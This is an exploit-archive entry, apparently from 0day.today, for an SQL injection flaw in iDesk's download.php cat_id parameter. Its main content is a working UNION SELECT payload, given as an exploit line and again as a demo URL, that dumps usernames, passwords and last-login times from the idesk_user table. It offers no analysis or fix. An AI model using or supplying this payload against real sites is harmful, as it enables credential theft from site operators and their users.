id: 10210
date: 12/13/2009
title: iDesk (download.php cat_id) SQL Injection Vulnerability
author: Manas58
cves: 

=======================================================
iDesk (download.php cat_id) SQL Injection Vulnerability
=======================================================

###############################################################
##############################################################
##
##  SQL Injection Vulnerability ( download.php cat_id )
##
## iDesk
##
##
##
###############################################################
###############################################################
##
## [ Exploit ]       
##
##     download.php?cat_id=3+UNION+SELECT+0,0,0,0,concat_ws(0x3a,user_name,password,last_login),0,0,0,0+from+idesk_user--
##
## http://www.site.com/download.php?cat_id=sql
##
##
## [DEMO ]
## http://server/support/download.php?cat_id=3+UNION+SELECT+0,0,0,0,concat_ws(0x3a,user_name,password,last_login),0,0,0,0+from+idesk_user--
##
########################
########################
  
 
#########################################################################################################
#########################################################################################################



#  0day.today [2023-03-27]  #